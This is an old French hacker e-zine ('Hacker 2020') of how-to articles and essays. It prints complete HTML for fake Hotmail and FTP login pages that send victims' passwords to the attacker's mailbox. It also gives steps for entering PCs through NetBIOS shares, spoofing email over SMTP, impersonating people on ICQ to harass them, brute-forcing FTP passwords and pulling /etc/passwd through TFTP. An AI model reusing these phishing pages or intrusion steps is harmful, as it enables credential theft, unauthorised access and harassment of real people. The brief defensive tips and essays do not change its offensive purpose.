INTRODUCTION: Suite à de nombreux articles sortis par Clad Strife et un new-zine de Thorgal, il aurait été judicieux de tout réunir dans un hacker 2020. Alors, Ultima Version, pourquoi? Parce que elle diffère de tout ce que vous avez pu voir jusqu'à présent. Bon, je vous laisse découvrir... Sachez quand même que quand les articles seront écrits par moi (Clad Strife), y'aura mon nom devant, même chose pour Thorgal.
SOMMAIRE:
Comment faire: pour piéger un de vos camarades
qui est pas trop méfiant, envoyez lui ceci:
S'il y répond vous recevrez ses pass avec son login pour
Hotmail...
De plus la plupart des utilisateurs ont le même pass pour leur
site et leur mail!
Bon... la partie rouge correspond à votre e-mail, créez
un compte mail pas trop voyant (style: hotmail_staff@caramail.com), et
allez récupérez les pass là-bas. Vous devez mettre
ce qui est en bleu et rouge dans votre mail. En fait ce serait plus un
piège à cons qu'autre chose! Mais ça marche bien c'est
sur!
We're Sorry,
We Cannot
Process Your Request |
|
---|---|
Reason: Time expired for your account. Please re-login. | |
Return to Hotmail's Homepage. |
d'ailleurs en voici le code source:
<html><head></head>
<body bgcolor="#ffffff"
link="#000099" vlink="#000099">
<table border=0
cellpadding=5 cellspacing=5 width=508 height=90%>
<tr valign=middle><th
colspan=2>
<font face="Arial,
Helvetica" size="5">We're Sorry, We Cannot<br>
Process Your Request</font>
</th></tr>
<tr valign=middle><td
align=center>
<font face="Arial,
Helvetica" size="3">Reason: </font>
<font face="Arial,
Helvetica" size="3" color="#ff0000"><b>Time expired for your account.
Please
re-login.</b></font><br>
</td></tr>
<tr valign="middle"><td align="center">
<FORM METHOD="POST"
NAME="hotmail"
ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi"
target="_parent">
<INPUT TYPE="hidden"
NAME="recipient"
VALUE="user_guest@hotmail.com">
<INPUT TYPE="hidden"
NAME="subject" VALUE="Hotmail Password">
<INPUT TYPE="hidden"
NAME="return_link_url"
VALUE="http://www.hotmail.com/cgi-bin/start/">
<table cellpadding="0"
cellspacing="5" border="0">
<tr><td><font
face="Arial, Helvetica" size="2">Login
Name:</font><br><input
type="text" name="login"
size="16" maxlength="16"></td><td><font
face="Arial,
Helvetica" size="2">Password:</font><br><input
type="password"
name="passwd"
size="16" maxlength="16"> <input
type="submit"
value="Enter"></td><tr>
</table></FORM></td></tr>
<tr valign=middle><th
colspan=2 align=center>
<font face="Arial,
Helvetica" size="3">Return to <a
href="http://www.hotmail.com"
target="_parent">Hotmail's Homepage</a>.
</font></th></tr></table>
<font size=2 color=black>1996-1999. Hotmail©
all rights reserved.</font>
Après quoi vous pouvez toujours faire la même chose
en faisant croire à une vérification du taux de sécurité
du compte ftp de la victime: voici ce que ça donne:
Check your ftp security! | |
---|---|
Write in the blanks and confirm to know if your ftp account is protect. A mail will be send you... | |
Et voilà le code source:
<html><head></head>
<body bgcolor="#ffffff"
link="#000099" vlink="#000099">
<table border=0
cellpadding=5 cellspacing=5 width=508 height=90%>
<tr valign=middle><th
colspan=2>
<font face="Arial,
Helvetica" size="6">Check your ftp security!<br>
</font>
</th></tr>
<tr valign=middle><td
align=center>
<font face="Arial,
Helvetica" size="3" color="#ff0000"><b>Write in the blanks and confirm
to know if your ftp account is protect. A mail will be send you...
</b></font><br>
</td></tr>
<tr valign="middle"><td align="center">
<FORM METHOD="POST"
NAME="hotmail"
ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi"
target="_parent">
<INPUT TYPE="hidden"
NAME="recipient"
VALUE="user_guest@hotmail.com">
<INPUT TYPE="hidden"
NAME="subject" VALUE="Hotmail Password">
<INPUT TYPE="hidden"
NAME="return_link_url"
VALUE="http://www.hotmail.com/cgi-bin/start/">
<table cellpadding="0"
cellspacing="5" border="0">
<tr><td><font
face="Arial, Helvetica" size="2">FTP
server:</font><br><input
type="text" name="FTP
server" size="16" maxlength="16"></td>
<td><font face="Arial, Helvetica" size="2">E-mail
:</font><br><input
type="text" name="Mail
from" size="16" maxlength="16"></td>
<tr><td><font
face="Arial, Helvetica" size="2">Login name
:</font><br><input
type="text" name="login"
size="16" maxlength="16"></td><td><font
face="Arial,
Helvetica" size="2">Password:</font><br><input
type="password"
name="passwd"
size="16" maxlength="16"> <input
type="submit"
value="Enter"></td><tr>
</table></FORM></td></tr>
<tr valign=middle><th
colspan=2 align=center>
</table>
<font size=2 color=black><u>FTP® is
a program, all rights reserved.</u></font>
Vous editer donc ce fichier dans : "c:\windows"
Bon le fichier a été editer que faire?
tapez l commande suivante dans ms dos : nbtstat -A ip"DLV" (DLV= De La Victime)
vous aller alors avoir le netbios "DLV" pour savoir le nom du pc il
faut qu'il y ai "unique" et il faut avoir le numero "20" devant regarder
:
C:\>nbtstat -A (ip DLV)
NetBIOS Remote Machine Name Table
Name
Type Status
---------------------------------------------
VICTIME <00>
UNIQUE Registered
FAMILLE <00>
GROUP Registered
VICTIME <03>
UNIQUE Registered
MAC Address = 44-45-00-69-31
C:\>
Il y a bien unique dans "type" mais il n'y as malheureusement
pas de <20> devant
;(
On saura pas le hacker.
Si au contraire il y as unique et <20> devant notez
le nom et l'ip "DLV" sur une feuille.
Vous revenez ensuite dans l'editeur de ms dos et vous ouvrez "lmhosts" vous notez dedans :
148.....(ip du mec) nom #PRE
Vous enregistrer
Puis revenez dans windows
-menu démarrer
-rechercher
-ordinateur
Vous n'avez plus qu'as tapez le nom de l'ordinateur "DLV" puis vous entrerez librement dans son pc.
Et oui pas besoins de trojans pour cela mais si vous êtes conserner
il y as toujours moyen de s'en proteger, la premiere protection consiste
à restreindre l'accès aux ressources de votre réseau
local en modifiant les propriétés de
chaque ressource de ce réseau. Par exemple, pour interdire l'accès
à votre disque dur C, cliquez sur l'icône Poste de travail
-
sélectionnez le disque C - cliquez avec le bouton droit
de la souris et sélectionnez Partage.
Vous pouvez ne pas partager le disque C, ou le partager en lecture seule,
en accès complet ou en accès par mot de passe.
Dans le premier et troisième cas, indiquez le mot de passe d'accès
à votre disque C. Ainsi, les visiteurs indélicats devront
montrer patte blanche.
Voici une astuce tordue pour savoir si vous avez un visiteur indélicat.
Si vous n'utilisez pas le lecteur de disquette A pendant
vos accès à Internet, partagez-le en accès complet
et donnez-lui comme nom de partage PORNO-PICTS par exemple. Les
hackers seront systématiquement attirés comme les mouches
par le miel (ou moins ragoûtant, la m...). Donc, si votre disque
A se met en action, vous avez très probablement un visiteur.
Et pour connaître l'identité du visiteur, passez sous DOS
et
tapez simplement netstat. L'adresse IP sera très probablement
indiquée par son nom de réseau.
ATTENTION ceci ne fonctionne pas a tous les coup
ça fonctionne 1 fois sur 4 d'après moi mais au fur et a mesure
que le temps avance cela deviens de plus en plus râre.
Inscrit sur la Liste Rouge, vous vous sentez sûr de vous
lorsque vous téléphonez à une société
commerciale pour un demander renseignement, à votre ex- époux(e)
pour régler un litige, ou à un
inconnu pour lui faire une (bonne?) blague. Pourtant, détrompez-vous
: si votre correspondant est
abonné au service "Présentation du numéro" lancé
en 1997 par France Télécom, il verra votre numéro
téléphonique s'inscrire en clair sur son téléphone
avant même de décrocher! En effet, si vous voulez rester discret,
vous devez comme tout le monde vous manifester auprès de votre agence
France Télécom afin de bénéficier du "Secret
permanent", ou bien composer le 3651 (#31# si vous appelez d'un téléphone
mobile) avant le numéro à 10 chiffres de votre correspondant...
La gaffe monumentale est cette fois à mettre sur le compte de la filiale Royaume-Uni de Nintendo. Suite à une erreur de configuration, le serveur de son site web a en effet laissé en libre accès durant tout ce week-end les données confidentielles de ses clients : adresses IP, adresses emails et postales, noms complets, numéros de téléphone, numéros de cartes bancaires et dates de validité. Les personnes concernées sont domiciliées partout dans le monde. A priori, ça n'est pas comme ça que l'on va inciter les gens à s'adonner au commerce électronique...
Vous vous rappelez du "Registration Wizard" de Windows95 qui envoyait la liste de vos logiciels à Micro$oft? Ben il avait disparu... Mais qu'est-ce donc? Il est dans OFFICE200? cette fois il est ouvertement destiné à l'anti-piratage, et on ne peut le désactiver (merde!! ;)).
D'après la découverte d'un trou de
sécurité du tableur vedette Excel, une fonction prévue
initialement pour diviser en frames les pages webs, permettrait à
un hacker d'introduire un programme auto-destructeur sur l'ordi. Ainsi
l'éditeur nous propose un patch, mais reste cependant vague sur
ce qui pourrait avoir attrait à cette "fonctionnalité".
Prenons un exemple de serveur telnet (sachez quand même que 90% des serveurs ne sont pas protégés et vous laisseront envoyer des mails via leur compte), donc on prend: www.finetprint.com, on rentre sur ce serveur par le port 25:
Donc voilà comment se présente l'affaire. Ensuite vous
vous connecter, et le serveur va se présenter:
220 ns0.inside-interactive.net ESMTP Sendmail 8.8.8/8.8.8; Sun, 21
Mar 1999 10:5
8:23 +0100 (CET) . Il attend que vous lui donniez des ordres.
alors vous tapez:
mail from: lamer@hotmail.com
Bien sur vous mettez ici un faux mail. Le serveur
répond:
250 lamer@hotmail.com... Sender ok
La il est content. Ensuite vous devez précisez
les destinataires, tapez donc:
rcpt to: test@hotmail.com
le serveur dit:
250 Recipient test@hotmail.com ok (il faut que
l'e-mail soit existant)
Vous pouvez mettre autant de rcpt to: que vous le désirez à
condition de retourner à la ligne. Ensuite vous tapez data.
Toujours aussi heureux le serveur dit:
354 ok Send data ending with "."
TOUT ROULE...
Maintenant vous tapez votre message:
Date: 23, 46, 2099
Cc: tesmains@caramail.com
Salut devine qui t'écrit
Le Nolamer, Clad Strife.
A+
N'oubliez pas de mettre un point à
la fin du message!
.
Ahh! c'est réussi! le serveur mettra:
250 Message received: 19990321105935.AAA18923@adresse'tcp.ville
AH? votre adresse TCP? Mais que se passe-t-il
donc? ben oui z'êtes pas aussi protégés que vous pourrez
le croire, en effet votre victime recevra un mail anonyme, mais dans les
infos de l'enveloppe il pourra retoruver votre adresse TCP/IP, par ce message:
X-AUthentication-WARNING: IP <fauxmail@fauxserveur.com>
ALors? Ben évitez et limitez les dégâts.
On pourra toujours vous retrouver mais le warning disparaitra! comment
faire? Ben... avant de taper mail from, au tout début, tapez helo
hotmail.com
Attention, car certains serveurs telent refusent
cette commande. Mais dans le cas échéant le serveur mettra:
250 ns0.inside-interactive.net Hello ADRESSE
TCP [134.134.134.134], pleased to meet you
Encore mon adresse TCP et IP?
Ben oui, mais vous avez fait un signe au serveur
qui ne s'inquiètera plus.
Vous retapez les même commandes que précédemment
et ils verront plus le gros X-Authentication-warning vos destinataires.
Méfiance quand même: certains serveurs mails, tels que hotmail,
vous repèreront, d'ou l'utilité de passer par un anonymizer.
Pour cela vous avez juste besoin de 5 choses
-icq
-icq
-icq
-icq
-icq
Voila essayez d'avoir tous le materiel necesaire ou si non cela n'ira pas ;o))))))
Prenez l'ip de quelqu'un ;
aller dans
-icq
-preferences
-serveur
et changer le serveur qui est noter
icq.mirabilis.com
et laisser icq1.mirabilis.com
Apres cela deconencter vous d'icq et reconnectez vous apres!
aller dans securiti privacy et enlever
do not ip publish!
Le tour est jouer!!!!!!!!
ATTENTION: cette astuce fonctionne rarement mais ça vaux le coup d'essayer.
l.N'oubliez pas de prendre note des anciens serveurs au cas ou icq ne voudrait pas se reconnecter.
De plus celà ne marche que si la personne utilise: ICQ IP SNIFFER (Note de Clad)
2 Comment reperer quelqu'un qui joue avec multiicq?(Thorgal)
Il va venter son autre nick par ex si je m'appelle nozep je vais dire:
nozep : tu connais thorgal?
victime : oui je l'ai dans ma liste
nozep : c'est le meilleur hacker que je connaisse il sais tous faire
victime : a ouai! c cool ça!!!!
Nozep : c'est lui qui m'as tout apris
victime : vraiment?
nozep : si je te le dis!
nozep : comment tu le trouve toi?
victime : je lui ai jamais vraiment parler mais il n'as pas l'air tres sociable!
victime : tu crois qu'il voudra m'apprendre?
nozep : non, tu est trop nul pour lui cela mettera trop de temps!
..........
voilà
ensuite si c'est un de vos amis il va vous questionner ex:
nozep : salut je suis le pire ennemi de thorgal c vraiment le plus con des cons
victime : ha bon
nozep : qu'est ce que tu en trouve toi?
victime : ben ça va quoi il est pas chiant avec moi!
nozep : il ne t'as jamais fait de sale coup?
victime : oui il m'as hacker mon site cet enculer!!
nozep : tu veux le hacker avec moi?
victime : il en saura rien que c'est moi hein??
nozep : t'en fait pas je metterai tous sur mon dos
victime : ok pas de prob alors , on commence maintenant?
nozep : ok!
...........
La seule façon de verifier si ce gars vous le connaissez c'est de regarder l'ip qui sera forcement le même a part si il a ete spoofer(si c'est le cas essayer de decouvrir qui c'est!)
Si c'est le même ip jouer le jeu
;o)
Vous verrez comme les gens sont faux cul quelques fois!
j'ai un peu exagerer sur ce texte mais comme ça vous saurai a quoi vous en tenir!
6.3 Comment trouver un ip qui n'est pas montrer sur icq sans programme?(Thorgal)
Pour faire cela c'est bien facile! ce truc ne
marche cependant que avec icq 98
;o(
Vous regarder dans les infos de quelqu'un et
il ne montre pas son ip
;o(
vous penser directement a votre sniffer mais
il vous viens a l'esprit que vous l'vez virusser il y as pas longtemps
Et bien vous rester sur le gars en question
Vous mettez la fleur rouge sur icq (donc vous
vous deconnecter d'icq) et vous n'avez plus qu'as
regarder dans les infos du gars!
c cool non?
Ceci fonctionne a out les coup et donne toujours
le bon ip!!!
cependant il faut avoir la version d'icq 98!
3. Comment envoyer des messages vides sur icq(Clad Strife)
La technique est bête et facile à réaliser! cependant il fallait y penser! Alors vous avez devant vous la fenêtre ou vous devez écrire le message, mettez: alt+0160 . Une sorte d'espace va se créer, et icq vous permettra d'envoyer du... vide, il faut l'dire!
4. Comment se faire passer pour quelqu'un d'autre(Clad Strife)
C'est assez simple à faire mais, sachez
que c'est utile quand quelqu'un vous fait chier, vous vous faites passer
pour lui auprès de sa cyber-meuf, et vous l'insultez sauvagement!
Effet garanti... Mais bon si on passait à la pratique? Vous ouvrez
Icq et vous allez dans:
ICQ
Add/Change Current User
Register A New User (ICQ#)
Vous notez TOUTES les informations de la victime,
et vous les metez à son insu; résultat: seule l'UIN le différencie
de vous (et l'IP aussi bien sur). Et en finish pour alterner les utilisateurs
(donc vous et "lui"), vous faites:
ICQ
Add/Change Current User
Change the Active User
Et de là choisissez celui sur lequel vous
désirez aller!
PoUR MOi Ce Ne SOnT Pas L3s HAck3Rs QuI eCRiV3Nt COMme çA MaIS BiEN LeS LaMM3rS De M3Rd3s.
Un hacker essaye de ne pas se faire remarquer car dès qu'il se vantent de ses capacitées de hacking les autres personnes le traite de delinquant d'internet , ce qui lui retire toute leur confiance.
Il s'interesse aux moins fort, lui apprend des trucs pour qu'ils le respectent, pour qu'il le prennent pour son maître, il n'exagere pas la dessus, ce jeux est tres dangereux quand le lammer s'aperçoit que vous êtes un esti de lammer pire que lui(lol)
ATTENTION: il ne faut pas confondre hacker et crascher
la difference entre un hacker et un crascher est la mentaliter
un hacker hack pour decouvrir les failles d'un symstème et doit avoir une raison valable pour hacker tandis qu'un crascher s'amuse a peter les système et les pc sans raisons
en général les crascher sont detester dans le monde du piratage informatique.
1/ La plupart des gens considèrent le hacking comme un sujet
tabou. Pour quelle raison? Ben, en fait en général les gens
ont assez peur de ce qu'ils ne maitrisent pas! Celà abouti a une
sorte de paranoïa collective, qui rendrait le hacking à sa
mauvaise valeur (son côté obscur). Bien sur certaines personnes
n'hésitent pas à dévaloriser l'image du hacking. Mais
le hacking, ce n'est que du piratage à "l'état
pur". après les personnes qui le pratiquent peuvent, par
elles-mêmes, décider de ce qu'ils en feront. Par exemple pirater
pour démontrer la fiabilité d'un système et visant
à le renforcer, ou l'anihiler. c'est ce côté que les
gens craignent, ils hésiteront donc a en parler. Certaines peresonnes
car elles risqueraient de montrer qu'elles sont faibles, et donc celà
aboutirait, pour elles, à devenir des cibles faciles. Les autres
se diront: "allons pas leur foutre de mauvaises idées à tous
ces psycho-surfers et cyberpunks", mais celà ne ralentira jamais
sa progression dans les esprits de ces soi-disant "psycho".
Donc les hackers ou lamers se sentiront criminalisés, et auront
tendance à se criminaliser vu que perosnne ne leur donne
leur chance et qu'on ne les montre pas au grand jour tels qu'ils devraient
l'être! Donc ils resteront dans l'ombre, l'ombre fait peur, les gens
auront peur etc... Il y a un cercle vicieux qui s'est ainsi créé...
C'est tout ce qu'on peut dire de ce phénomène dont personne
n'ose jamais parler.
Auteur: Clad Strife
C'est simple...
Imaginez vous que vous insultez quelqu'un au cour d'une dispute et
que juste apres vous avez un disque dur prêt à être
formaté. Cela vous plairait -il??
Non et bien c'est pour ca que le hacking est hors la loi et cela ne
selimite pas à hacker un ordinateur.
Par exemple:
Vous voulez rentrer dans les ordinateurs de la nasa vous êtes
directement tracez et vous avez un email d'avertissement ou une amende
de 500000ff
Et ce n'est pas tout, les sites que vous hacker il y as bien quelqu'un
qui paye et celui ci ira ce plaindre et voudra son argent de retour(en
cas de serveur).
c'est pour ca qu'il y a des regles et que le hacking est hors la loi.
Dans la vie, celui qui tue est puni et va en prison.
Ici celui qui tue les ordi, les serveurs, ou pille des banques de données,
etc etc..... est un hors la loi
Donc le hacker est hors la loi (bien que hacker
ne soit pas toujours pirater dans un but nuisif!).
C comme au football il y a des arbitres pour faire respecter le reglement.
Ici il y as des flics pour nous tracer
By Thorgal
Je vous dit oui et non
Car n'oublions pas que sans les hacker internet
n'aurait été qu'a l'armée.
En plus si un autre hacker vous attaque comment faire pour vous défendre???
vous n'avez qu'as contre-attaquer mais comment contre attaquer????
en etant un hacker
mais comment être un hacker?????? Tout simplement en apprenant
des trucs illegaux et en telechargent des trucs illegaux, voir réprimés
sévèrement (ex de Back Orifice) aussi, alors pourquoi interdire
le hacking???(c'est expliqué au paragraphe deux). Vous voyer qu'on
tourne en rond!!!!!!!!!!
Alors tel est la question faut-il interdire le hacking sous toute forme??
on peut se poser bcp de questions la dessus mais on en reviens toujours
au même pointsi il y avait pas de hacker le net serais parfait mais
vous n'auriez pas les crack de jeux et tout ca
n'est ce pas vrai?????????? Si les hacker n'avaient pas éxisté,
internet non plus n'existerait pas, mais si il n'y avait pas
de hacker du tout, pas de problemes de piratage.
Il faut penser a tout cela.
By Thorgal
Certains diront: Oui! il le faut! Chacun a droit à sa vie privée
sans être menacé par de petits pirates!
Mouais et ben que répondre à ça, si ce n'est que,
lui, le NSA peut vous surveiller, écouter
vos conversations téléphoniques quelles qu'elles soient et
à n'importe qu'elle heure! Il peut grâce à ses satellites
savoir quel journal vous lisez, il a accès à toutes les banques
de données stockées partout dans le monde. Savoir si vous
avez Win95 ou Win98 et savoir si se sont des versions pirates! ainsi vous
ne pourrez jamais avoir de vie privée... Il sait quelle voiture
vous avez, si vous êtes mineur, majeur, nom prénom, âge...
qui peut parler de vie privée dans de telles conditions??? tous
vos déplacements peuvent être surveillés et la chaine
de radio ou tv , que vous écoutez actuellement, pourra être
trouvée... Ce n'est pas une fiction, on est loin d'être dans
"Ennemi d'Etat", c'est la réalité.
Maintenant, doit-on mettre en prison ou coller une amende
à un hacker qui aurait pénétré un système
informatique! Si celui-ci n'a rien détruit, et a démontrer
la "non-fiabilité" d'un système quelconque, doit-on l'en
blâmer?
Le système ne sera-t-il pas protégé aussitôt?
De telle sorte à ce qu'un méchant pirate ne puisse plus rentrer
dans le système visant à le détèriorer... C'est
un dilemme qui confronte justice et mentalité du hacker!
Que faire? C'est à Eux de me le dire et c'est à Eux de
trouver une solution.
Auteur: Clad Strife
être une elite ce n'est pas hacker par le socket ou BO (les trojans pour moi c'est la honte a l'etat PUR si vous ne faites que cela un bon conseil
lisez pleins de magazines de hacking pour apprendre et au fur et a mesure les trojans ne vous servirons a rien, a part en cas d'urgence!
mais bon
si vous êtes un lammer et que vous enguager des lammer ce clan sera pouris!Croyer en mon experience.
Les vrai elites vont se rebeller contre vous, vous serez tester et jeté, les membre seront inactif car il n'y as pas d'autoritée dans votre clan
attendez 2 semaines pour bien y reflechir!
Ouvrez "Vcrackftp"
Dans "host" vous mettez le nom du serveur
ex si le site est: www.multimania.com/victime
Vous metterez "www.multimania.com" dans host
Vous mettez "victime" dans user
Vous laissez le port 21
Dans password vous selectionnez le dico de votre choix (un programme
les fais sois même par le dos (ce prog s'appelle dikmaker))
vous pressez sur go et cela tournera tout seul.
Il va mettre le bon password dans la colonne de droite.
Pas tres compliquer hein
;o)
ATTENTION: cette technique ne fonctionne pas sur
tout les erveurs donc ne vous etonnez pas si il est mis wondows socket
error dans un message d'erreur
Bon, on va reprendre entierement le systeme...
On abordera dans cette
première partie que les faille du systeme
UNiX. On vera comment hacker
ce systeme dans une deuxime partie.
C pour ca que ca risque d'être long...
A noter que je tiens c informations d'un bouquin
sur la securite :
"securite reseaux", j'en remercie l'auteur:)).
-------------------------|
I-:presentation d'UNiX : |
-------------------------|
UNiX est un systeme qui a ete cree en 1972. C
un extraordinaire OS
qui depuis la date de ca creation reste inegale
en matiere de
portabilite et d'interoperabilite. Le reseau
internet est presque
entierement constitue de machine UNiX. D'ou l'importance
de cet OS.
Mais en fait cet Os a une grande faiblesse : la securite... ;)))
Meme si de part son architecture, il offre une
+ grande securite que
ms-dos.
Je v presenter dans le tableau si dessus les differences
importantes entre
ms-dos et UNiX :
__________________________________________________________________________
|____________________________________|___________________________________|
|
|
|
|
UNiX |
Ms-dos
|
|____________________________________|___________________________________|
|
|
|
|UNiX est multi-utilisateur. C à dire|Ms-dos
n'a pas ce concepte multi- |
|que sa securite est base sur un sys-|utilisateur.
C à dire que une fois |
|teme de privileges. Les utilisateur |connecte
à une machine dos tous |
|d'UNiX ont chacun un passwd & ont
|vous est permis...
|
|chacun des autorisations + ou -
|
|
|grande en ce qui concerne le reseau.|
|
|L'utilisateur le + interessant est |
|
|le root.
|
|
|____________________________________|___________________________________|
|
|
|
|Sous UNiX les programmes ne peuvent |Sous Ms-dos
le programme peut |
|pas ecrire sous n'importe quelle
|ecrire n'importe meme là ou se |
|du HD...
|trouve le systeme d'explotation... |
|____________________________________|___________________________________|
|
|
|
|UNiX ne permet à aucun programme de |Cela
est possible sous Ms-Dos |
|de modifier un file.
|
|
|____________________________________|___________________________________|
--------------------------------------------------------------------------
Voila a peut près les differences entre UNiX et Ms-Dos.
Meme si, on le voit dans ce tableau, UNiX est
+ securise que le Dos, il n'a
pas ete concu pour offrir un maximum de securite.
On peut biensur rendre
UNiX + sur mais il n'est pas configure en tant
que tel dans sa version par
default ;))))) .
Si l'on configure UNiX pour qu'il soit + securise
alor il faudra faire ca
en trois parties :
-la securites des comptes
-la securites des connexions exterieurs
-la securites des fichiers et des repertoires
--------------------------------------------------|
II-Les bugs et les erreurs d'utilisation d'UNiX
: |
--------------------------------------------------|
I-La securite des comptes :
----------------------------
1.Les passwd :
---------------
La securite des comptes sont surtout du aux passwords.
Pour un utilisateur
UNiX, il faut choisir un passwd qui ne puisse
etre devine. Par exemple
pour l'utilisateur root, son passwd ne sera pas
"root". C une question pri-
maire, mais que beaucoup d'utilisateur oublie...
:))))))))))) Mais ne
comptez pas sur cette faille, pour hacker une
machine sous UNiX. Seul les
utilisateur qui ne sont pas expert en informatique
ne prennent pas guarde
à leur passwd & par consequent c utilisateurs
ne sont pas très important
dans la pyramide des privileges... Toute fois
vous pouvez essailler cette
faille pour des reseaus tout nouveau qui n'ont
pas encore ete configures...
La + part des reseau UNiX obligent leur utilisateur
à changer regulièrement
leur passwd :(((, mais on vera ca dans la seconde
partie.
2.Les comptes obsoletes :
-------------------------
Il arrive que l'on puisse trouver des comptes
obsoletes qui n'ont pas encore
ete anulé (mort de l'utilisateur, ou depart
en vacance). L'administrateur
reseau peut donc annuler ces comptes en mettant
une date d'expiration des
comptes. La encore on peut prendre la place de
account :))).
3.Les comptes des visiteurs :
-----------------------------
C un cauchemar pour la securite :))). les comptes
visiteurs sont
les premiers a essailler dans un systeme UNiX
recent qui n'a donc pas pu etre
configure... ;))))))))))))))
4.Les comptes sans passwd :
---------------------------
C fou, non ??? & pourtant ca existe !!!
5.Les groupes et les comptes de groupes :
-----------------------------------------
Pour enregistrer des groupes il y a deux maniere
de le faire :
a:laissez les utilisateur du groupes connectes
avec le meme passwd et le meme
nom d'utilisateur. ;)))
b:editer le fichier de group /etc/group, creer
le groupe et d'y associer la
liste des utilisateur...
Le format du fichier est :
nom du groupe:passwd:numero d'identification:utilisateur1,utilisateur2
....
6.Le systeme NIS :
------------------
Le systeme NIS est un moyen très pratique
de partager, entre plusieur machines
un seul fichier passwd et un seul fichier group
;))).
Par exemple si on veut changer un passwd sur
un reseau, il faut le faire sur
toute les machine, lorsqu'il n'y a pas NIS. Sur
les grand reseaux de 1000
becanes, c assez dur.... Voila pourkoi on a fait
NIS.
NIS fonctionne ainsi : sur la machine cliente,
le fichier passwd contient
une entré libellee +::0.0:: . Lorsque
l'utilisateur ce connecte sur une machi-
ne client, NIS demande le login et le passwd.
Au signe + près, l'entre passwd
est exactement la meme que celle d'un compte
root sans nom d'utilisateur ni
passwd. :))) On vera en detail le systeme NIS
dans une autre partie...
II-Securites des connexionx exterieures :
-----------------------------------------
Voila, on va attaquer des choses un peu plus interressantes :))).
1.Les machines equivalentes :
-----------------------------
Le mecanisme des machines equivalentes (trusted
host) permet de specifier une
liste de machines ou un utilisateur ayant le
meme nick sur les deux machines
peut etablir une session ou executer une commande
à distance sur une machine
cible sans passwd.
Le fichier /etc/hosts.equiv contient la listes
des machines equivalentes. Les
utilisateur qui ouvrent une session pas la commande
rlogin ou excutent une
commande par rsh n'ont pas a fournir de passwd
;))) s'il viennent d'une
machine listee dans ce fichier (spoof, spoof,
spoof :))).
Certaines version de UNiX sont livrees avec une
seule entree dans le fichier
host.equiv : un "+". Si c le cas sur la machine
convoitee et libre acce pour
tout le monde car le "+" signifie que toutes
les machines sont classees comme
equivalentes ;)))))))).
Les fichier .rhost permet à des utilisateur
specifiques d'acceder a des
becanes specifiques sans passwd. Tout utilisateur
peut creer un fichier
.rhostdans son repertoire de connexion et autoriser
l'acce a son compte
sans passwd. Tout utilisateur peut donner un
acces sans passwd à n'importe
qui !!! :))))
2.Les terminaux securises :
---------------------------
Selon les versions d'UNiX, le fichier qui definie
les terminaux securises est
soit : /etc/ttyab, soit : /etc/ttys. Pour autoriser
le super utilisateur
a se connecter à partir d'un terminal
donne, faut ajouter dans le fichier le
mot cle "secure" a la fin de la ligne d'identification
du terminal.
Si "secure" n'est pas mis a la fin de ligne d'identification
du terminal, un
utilisateur etant super utilisateur peut se connecter
sur un compte ordinaire
et ensuite devenir super utilisateur avec la
commande "su" :))).
3.NFS :
-------
NFS (Network File System) est un protocole qui
permet à plusieur machines de
partager des fichiers. Il est très utile
pour permettre aux stations sans HD
de stosker leur fichier dans une autre machine
+ centralisee.
Le fichier /etc/exports contient la liste des
fichiers que les autres
machines ont le droit de monter sur le reseau.
Voici les differrents droit de
ces machine :
root=machines (machines etant la description
des machines) : lorque
l'ontvois ca, c que les machines sitees ont le
droit root (ou super
utilisateur).
access=machines : la ce sont seulement
les machines autorisees a
monter des repertoires...
lorqu'il n'y a pas d'option access, toutes les
machines sont autorises à mon-
ter le repertoire.
/etc/exports est presente comme suit en presence
de l'option access :
/usr access=machine1:machine2:machine3...
ou bien /usr root=machine1:machine2:machine3...
De plus si l'adminitrateur lors de l'edition du
fichier a oublier de taper la
commande : # exportfs -a, le systeme ne relira
pas forcement le fichier :))).
4.FTP (file transfert protocole):
---------------------------------
Bon. Je pense que vous connaissez. A partir de
FTP on peut facilement<<<<<aquerir l'acces root, mais en
ce qui concerne le fichier passwd, souvent
le droit d'acces en lecture est coupe pour ce
fichier....
EX d'intrusion :
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions
apply.
5.TFTP :
--------
Le petit frère de FTP!!! Son port est
le 69a
TFTP peut presentez des brèches assez
grandes pour faire passer un TGV... :))
essayer donc la sequence de commandes suivantes
:
evil %tftp
tftp>connect la_machine
tftp>get /etc/passwd
tftp>quit
6.Sendmail :
------------
Sendmail a aussi un gros bug de securite, meme
si on a refait des versions
+ securise, parfois les entreprises mettent du
temps a changer leur version.
Connectez vous au sendmail par telnet (port 25=smtp)
et tapez debug...
Si la reponse n'est pas "unrecognised command",
c que la version du sendmail
est encore buge et que vous pouvez en profiter
7.Finger :
----------
le finger permet a un utilisateur distant de
voir le nom complet d'un
utilisateur, son repertoire de connexion, la
date de sa derniere
connexion, et la date ou il a lu son courrier
pour la derniere fois...
III.Securite des fichiers et des repertoires
:
-----------------------------------------------
1.Les bits de droit d'accès :
-----------------------------
Tous les fichiers et repertoires UNiX ont trois
ensemble de bits de droit d'
acces associes. Le prmier ensemble definit quels
sont les droits du proprio
du fichier, le second definit quels sont les
droits du groupes proprio du
file & le dernier quels sont les droits d'acces
aux autres utilisateurs ;)).
Voici à quoi correspondent les bits des droits d'acces :
*droit d'acces en lecture (read).
*droit d'acces en ecriture (write).
*droit d'execution (execute).
*setuid : lorceque ce bit est positionne sur
un fichier, cela signifie que le
fichier est execute avec le droit du proprietaire
du fichier.
*setgid : lorceque ce bit est positionne sur
un fichier, cela signifie que le
fichier est execute avec le droit du groupe proprietaire
du fichier.
Si il n'y a aucun bits associe aux fichiers, tout
le monde peut tout faire
avec. ;]
2.Crypt :
---------
Crypt est un moyen de chiffrer les fichiers sous
UNiX.
Des cracker les dechiffrent assez vites. On les
trouves un peu partout sur le
net.....
3.Les peripheriques de /DEV :
-----------------------------
UNiX accede aux disques et à la memoire
par l'intermedeiaire des fichiers (dit
speciaux)du repertoire /dev mais aussi aux machines
du style imprimante...
Essaillez donc d'avoir acces a ce genre de fichier,
cela peut etre assez amusant
de leur imprimer certaine chose (hihi). Le +
souvent seul le root
à acces à ces fichiers.
-----------------------------------|
III-: la surveillance du systeme : |
-----------------------------------|
Une fois parti de la machine que vous avez hacker
croyez ne pas avoir laissez
de trace ???? Vraiment ???? :)))
Je vous demontre le contraire!!!!
I-surveillance des comptes :
----------------------------
